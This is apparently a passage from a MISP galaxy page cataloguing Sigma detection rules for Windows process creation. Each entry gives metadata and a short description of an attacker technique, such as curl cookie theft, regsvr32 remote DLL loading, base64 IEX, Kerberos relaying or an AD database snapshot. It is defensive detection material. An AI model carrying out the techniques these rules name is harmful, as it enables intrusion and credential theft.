logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Suspicious Child Process Of Veeam Database

Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.

Internal MISP references

UUID d55b793d-f847-4eea-b59a-5ab09908ac90 which can be used as unique global reference for Suspicious Child Process Of Veeam Database in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/04
falsepositive No established falsepositives
filename proc_creation_win_mssql_veaam_susp_child_processes.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']

Active Directory Database Snapshot Via ADExplorer

Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the Active Directory database.

Internal MISP references

UUID 9212f354-7775-4e28-9c9f-8f0a4544e664 which can be used as unique global reference for Active Directory Database Snapshot Via ADExplorer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/14
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_adexplorer_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.001', 'attack.t1003.003']

Suspicious Rundll32 Execution With Image Extension

Detects the execution of Rundll32.exe with DLL files masquerading as image files

Internal MISP references

UUID 4aa6040b-3f28-44e3-a769-9208e5feb5ec which can be used as unique global reference for Suspicious Rundll32 Execution With Image Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hieu Tran
creation_date 2023/03/13
falsepositive ['Unknown']
filename proc_creation_win_rundll32_susp_execution_with_image_extension.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']

Potential UAC Bypass Via Sdclt.EXE

A general detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used in UAC bypass techniques.

Internal MISP references

UUID 40f9af16-589d-4984-b78d-8c2aec023197 which can be used as unique global reference for Potential UAC Bypass Via Sdclt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_sdclt.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002']

Compress Data and Lock With Password for Exfiltration With 7-ZIP

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

Internal MISP references

UUID 9fbf5927-5261-4284-a71d-f681029ea574 which can be used as unique global reference for Compress Data and Lock With Password for Exfiltration With 7-ZIP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/27
falsepositive ['Legitimate activity is expected since compressing files with a password is common.']
filename proc_creation_win_7zip_password_compression.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']

New Network Trace Capture Started Via Netsh.EXE

Detects the execution of netsh with the "trace" flag in order to start a network capture

Internal MISP references

UUID d3c3861d-c504-4c77-ba55-224ba82d0118 which can be used as unique global reference for New Network Trace Capture Started Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kutepov Anton, oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_packet_capture.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential_access', 'attack.t1040']

Winrar Execution in Non-Standard Folder

Detects a suspicious WinRAR execution in a folder that is not the default installation folder

Internal MISP references

UUID 4ede543c-e098-43d9-a28f-dd784a13132f which can be used as unique global reference for Winrar Execution in Non-Standard Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tigzy
creation_date 2021/11/17
falsepositive ['Legitimate use of WinRAR in a folder of a software that bundles WinRAR']
filename proc_creation_win_winrar_uncommon_folder_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']

Suspicious Child Process Of Wermgr.EXE

Detects suspicious child processes of the Windows Error Reporting manager (wermgr.exe)

Internal MISP references

UUID 396f6630-f3ac-44e3-bfc8-1b161bc00c4e which can be used as unique global reference for Suspicious Child Process Of Wermgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/14
falsepositive ['Unknown']
filename proc_creation_win_wermgr_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055', 'attack.t1036']

Suspicious PowerShell Invocations - Specific - ProcessCreation

Detects suspicious PowerShell invocation command parameters

Internal MISP references

UUID 536e2947-3729-478c-9903-745aaffe60d2 which can be used as unique global reference for Suspicious PowerShell Invocations - Specific - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/05
falsepositive ['Unknown']
filename proc_creation_win_powershell_invocation_specific.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential Amazon SSM Agent Hijacking

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

Internal MISP references

UUID d20ee2f4-822c-4827-9e15-41500b1fff10 which can be used as unique global reference for Potential Amazon SSM Agent Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal
creation_date 2023/08/02
falsepositive ['Legitimate activity of system administrators']
filename proc_creation_win_ssm_agent_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.persistence', 'attack.t1219']

Potential Suspicious Windows Feature Enabled - ProcCreation

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

Internal MISP references

UUID c740d4cf-a1e9-41de-bb16-8a46a4f57918 which can be used as unique global reference for Potential Suspicious Windows Feature Enabled - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/29
falsepositive ['Legitimate usage of the features listed in the rule.']
filename proc_creation_win_powershell_enable_susp_windows_optional_feature.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential Cookies Session Hijacking

Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.

Internal MISP references

UUID 5a6e1e16-07de-48d8-8aae-faa766c05e88 which can be used as unique global reference for Potential Cookies Session Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Unknown']
filename proc_creation_win_curl_cookie_hijacking.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Driver/DLL Installation Via Odbcconf.EXE

Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.

Internal MISP references

UUID cb0fe7c5-f3a3-484d-aa25-d350a7912729 which can be used as unique global reference for Suspicious Driver/DLL Installation Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/23
falsepositive ['Unlikely']
filename proc_creation_win_odbcconf_driver_install_susp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']

Potentially Suspicious Call To Win32_NTEventlogFile Class

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

Internal MISP references

UUID caf201a9-c2ce-4a26-9c3a-2b9525413711 which can be used as unique global reference for Potentially Suspicious Call To Win32_NTEventlogFile Class in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/13
falsepositive ['Unknown']
filename proc_creation_win_susp_nteventlogfile_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Invoke-Obfuscation Via Use Clip

Detects obfuscated PowerShell that uses Clip.exe in scripts

Internal MISP references

UUID e1561947-b4e3-4a74-9bdd-83baed21bdb5 which can be used as unique global reference for Invoke-Obfuscation Via Use Clip in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

SQL Client Tools PowerShell Session Detection

This rule detects execution of PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server Management Studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

Internal MISP references

UUID a746c9b8-a2fb-4ee5-a428-92bee9e99060 which can be used as unique global reference for SQL Client Tools PowerShell Session Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Agro (@agro_sev) oscd.community
creation_date 2020/10/13
falsepositive ['Direct PS command execution through SQLToolsPS.exe is uncommon; the child process sqltoolsps.exe spawned by smss.exe is a legitimate action.']
filename proc_creation_win_mssql_sqltoolsps_susp_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1127']

Filter Driver Unloaded Via Fltmc.EXE

Detects filter driver unloading activity via fltmc.exe

Internal MISP references

UUID 4931188c-178e-4ee7-a348-39e8a7a56821 which can be used as unique global reference for Filter Driver Unloaded Via Fltmc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali
creation_date 2023/02/13
falsepositive ['Unknown']
filename proc_creation_win_fltmc_unload_driver.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1562', 'attack.t1562.002']

PowerShell Base64 Encoded IEX Cmdlet

Detects usage of a base64 encoded "IEX" cmdlet in a process command line

Internal MISP references

UUID 88f680b8-070e-402c-ae11-d2914f2257f1 which can be used as unique global reference for PowerShell Base64 Encoded IEX Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/08/23
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_iex.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Driver/DLL Installation Via Odbcconf.EXE

Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.

Internal MISP references

UUID 3f5491e2-8db8-496b-9e95-1029fce852d4 which can be used as unique global reference for Driver/DLL Installation Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized.']
filename proc_creation_win_odbcconf_driver_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']

Audio Capture via SoundRecorder

Detects an attacker collecting audio via the SoundRecorder application.

Internal MISP references

UUID 83865853-59aa-449e-9600-74b9d89a6d6e which can be used as unique global reference for Audio Capture via SoundRecorder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate audio capture by legitimate user.']
filename proc_creation_win_soundrecorder_audio_capture.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1123']

Remote Access Tool - NetSupport Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and TeamViewer are used frequently by adversaries when compared with other legitimate software. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 758ff488-18d5-4cbe-8ec4-02b6285a434f which can be used as unique global reference for Remote Access Tool - NetSupport Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/25
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_netsupport.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Malicious PowerShell Commandlets - ProcessCreation

Detects cmdlet names from well-known PowerShell exploitation frameworks

Internal MISP references

UUID 02030f2f-6199-49ec-b258-ea71b07e03dc which can be used as unique global reference for Malicious PowerShell Commandlets - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/02
falsepositive ['Unknown']
filename proc_creation_win_powershell_malicious_cmdlets.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.discovery', 'attack.t1482', 'attack.t1087', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1069.001', 'attack.t1069.002', 'attack.t1069', 'attack.t1059.001']

Suspicious Extexport Execution

Extexport.exe loads a DLL and is executed from a folder other than its original path

Internal MISP references

UUID fb0b815b-f5f6-4f50-970f-ffe21f253f7a which can be used as unique global reference for Suspicious Extexport Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_extexport.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Msiexec Quiet Installation

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

Internal MISP references

UUID 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5 which can be used as unique global reference for Msiexec Quiet Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['WindowsApps installing updates via the quiet flag']
filename proc_creation_win_msiexec_install_quiet.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']

Suspicious RDP Redirect Using TSCON

Detects a suspicious RDP session redirect using tscon.exe

Internal MISP references

UUID f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb which can be used as unique global reference for Suspicious RDP Redirect Using TSCON in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/03/17
falsepositive ['Unknown']
filename proc_creation_win_tscon_rdp_redirect.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1563.002', 'attack.t1021.001', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

PUA - Adidnsdump Execution

This tool enables enumeration and exporting of all DNS records in the zone for reconnaissance purposes on internal networks. Python 3 and python.exe must be installed. Used to query/modify DNS records for Active Directory integrated DNS via LDAP.

Internal MISP references

UUID 26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160 which can be used as unique global reference for PUA - Adidnsdump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_python_adidnsdump.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

PowerShell Base64 Encoded Reflective Assembly Load

Detects base64 encoded .NET reflective loading of Assembly

Internal MISP references

UUID 62b7ccc9-23b4-471e-aa15-6da3663c4d59 which can be used as unique global reference for PowerShell Base64 Encoded Reflective Assembly Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
creation_date 2022/03/01
falsepositive ['Unlikely']
filename proc_creation_win_powershell_base64_reflection_assembly_load.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1027', 'attack.t1620']
Related clusters

To see the related clusters, click here.

Read Contents From Stdin Via Cmd.EXE

Detect the use of "<" to read and potentially execute a file via cmd.exe

Internal MISP references

UUID 241e802a-b65e-484f-88cd-c2dc10f9206d which can be used as unique global reference for Read Contents From Stdin Via Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/07
falsepositive ['Unknown']
filename proc_creation_win_cmd_stdin_redirect.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Renamed Whoami Execution

Detects the execution of whoami that has been renamed to a different name to avoid detection

Internal MISP references

UUID f1086bf7-a0c4-4a37-9102-01e573caf4a0 which can be used as unique global reference for Renamed Whoami Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/12
falsepositive ['Unknown']
filename proc_creation_win_renamed_whoami.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Visual Studio Code Tunnel Shell Execution

Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.

Internal MISP references

UUID f4a623c2-4ef5-4c33-b811-0642f702c9f1 which can be used as unique global reference for Visual Studio Code Tunnel Shell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/25
falsepositive ['Legitimate use of Visual Studio Code tunnel and running code from there']
filename proc_creation_win_vscode_tunnel_remote_shell_.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Rebuild Performance Counter Values Via Lodctr.EXE

Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.

Internal MISP references

UUID cc9d3712-6310-4320-b2df-7cb408274d53 which can be used as unique global reference for Rebuild Performance Counter Values Via Lodctr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/15
falsepositive ['Legitimate usage by an administrator']
filename proc_creation_win_lodctr_performance_counter_tampering.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Network Reconnaissance Activity

Detects a set of suspicious network related commands often used in recon stages

Internal MISP references

UUID e6313acd-208c-44fc-a0ff-db85d572e90e which can be used as unique global reference for Network Reconnaissance Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/07
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_nslookup_domain_discovery.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087', 'attack.t1082', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Rundll32 UNC Path Execution

Detects rundll32 execution where the DLL is located on a remote location (share)

Internal MISP references

UUID 5cdb711b-5740-4fb2-ba88-f7945027afac which can be used as unique global reference for Rundll32 UNC Path Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/10
falsepositive ['Unlikely']
filename proc_creation_win_rundll32_unc_path.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1021.002', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Suspicious Add Scheduled Task Parent

Detects suspicious scheduled task creations from a parent stored in a temporary folder

Internal MISP references

UUID 9494479d-d994-40bf-a8b1-eea890237021 which can be used as unique global reference for Suspicious Add Scheduled Task Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/23
falsepositive ['Software installers that run from temporary folders and also install scheduled tasks']
filename proc_creation_win_schtasks_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Regsvr32 HTTP/FTP Pattern

Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.

Internal MISP references

UUID 867356ee-9352-41c9-a8f2-1be690d78216 which can be used as unique global reference for Potentially Suspicious Regsvr32 HTTP/FTP Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/05/24
falsepositive ['Unknown']
filename proc_creation_win_regsvr32_network_pattern.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Suspicious File Download From IP Via Curl.EXE

Detects potentially suspicious file downloads directly from IP addresses using curl.exe

Internal MISP references

UUID 5cb299fc-5fb1-4d07-b989-0644c68b6043 which can be used as unique global reference for Suspicious File Download From IP Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Unknown']
filename proc_creation_win_curl_download_direct_ip_susp_extensions.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

HackTool - SharpUp PrivEsc Tool Execution

Detects the use of SharpUp, a tool for local privilege escalation

Internal MISP references

UUID c484e533-ee16-4a93-b6ac-f0ea4868b2f1 which can be used as unique global reference for HackTool - SharpUp PrivEsc Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/20
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpup.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1615', 'attack.t1569.002', 'attack.t1574.005']
Related clusters

To see the related clusters, click here.

Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE

Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share

Internal MISP references

UUID 044ba588-dff4-4918-9808-3f95e8160606 which can be used as unique global reference for Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_cmd_copy_dmp_from_share.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access']

Screen Capture Activity Via Psr.EXE

Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.

Internal MISP references

UUID 2158f96f-43c2-43cb-952a-ab4580f32382 which can be used as unique global reference for Screen Capture Activity Via Psr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community
creation_date 2019/10/12
falsepositive ['Unknown']
filename proc_creation_win_psr_capture_screenshots.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

Renamed PAExec Execution

Detects execution of a renamed version of PAExec, which is often used by attackers.

Internal MISP references

UUID c4e49831-1496-40cf-8ce1-b53f942b02f9 which can be used as unique global reference for Renamed PAExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jason Lynch
creation_date 2021/05/22
falsepositive ['Weird admins that rename their tools', 'Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing', 'When executed with the "-s" flag. PAExec will copy itself to the "C:\Windows\" directory with a different name. Usually like this "PAExec-[XXXXX]-[ComputerName]"']
filename proc_creation_win_renamed_paexec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Use of Remote.exe

Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.

Internal MISP references

UUID 4eddc365-79b4-43ff-a9d7-99422dc34b93 which can be used as unique global reference for Use of Remote.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/02
falsepositive ['Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).']
filename proc_creation_win_lolbin_remote.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Use of OpenConsole

Detects usage of the OpenConsole binary as a LOLBIN to launch other binaries in order to bypass application whitelisting.

Internal MISP references

UUID 814c95cc-8192-4378-a70a-f1aafd877af1 which can be used as unique global reference for Use of OpenConsole in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/16
falsepositive ['Legitimate use by an administrator']
filename proc_creation_win_lolbin_openconsole.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Ilasm Lolbin Use Compile C-Sharp

Detects use of Ilasm.exe to compile C# code into a DLL or EXE.

Internal MISP references

UUID 850d55f9-6eeb-4492-ad69-a72338f65ba4 which can be used as unique global reference for Ilasm Lolbin Use Compile C-Sharp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/07
falsepositive ['Unknown']
filename proc_creation_win_lolbin_ilasm.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Suspicious MsiExec Embedding Parent

Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads

Internal MISP references

UUID 4a2a2c3e-209f-4d01-b513-4155a540b469 which can be used as unique global reference for Suspicious MsiExec Embedding Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/16
falsepositive ['Unknown']
filename proc_creation_win_msiexec_embedding.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218.007', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

HackTool - KrbRelay Execution

Detects the use of KrbRelay, a Kerberos relaying tool

Internal MISP references

UUID e96253b8-6b3b-4f90-9e59-3b24b99cf9b4 which can be used as unique global reference for HackTool - KrbRelay Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/27
falsepositive ['Unlikely']
filename proc_creation_win_hktl_krbrelay.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Stdin

Detects obfuscated PowerShell passed via stdin in scripts.

Internal MISP references

UUID 9c14c9fa-1a63-4a64-8e57-d19280559490 which can be used as unique global reference for Invoke-Obfuscation Via Stdin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious File Execution From Internet Hosted WebDav Share

Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content from it, as seen in malicious LNK files.

Internal MISP references

UUID f0507c0f-a3a2-40f5-acc6-7f543c334993 which can be used as unique global reference for Suspicious File Execution From Internet Hosted WebDav Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/09/01
falsepositive ['Unknown']
filename proc_creation_win_cmd_net_use_and_exec_combo.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Userinit Child Process

Detects a suspicious child process of userinit

Internal MISP references

UUID b655a06a-31c0-477a-95c2-3726b83d649d which can be used as unique global reference for Suspicious Userinit Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Samir Bousseaden (idea)
creation_date 2019/06/17
falsepositive ['Administrative scripts']
filename proc_creation_win_susp_userinit_child.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

HH.EXE Execution

Detects the execution of "hh.exe" to open ".chm" files.

Internal MISP references

UUID 68c8acb4-1b60-4890-8e82-3ddf7a6dba84 which can be used as unique global reference for HH.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community
creation_date 2019/10/24
falsepositive ['False positives are expected with legitimate ".CHM"']
filename proc_creation_win_hh_chm_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.001']
Related clusters

To see the related clusters, click here.

Potential Fake Instance Of Hxtsr.EXE Executed

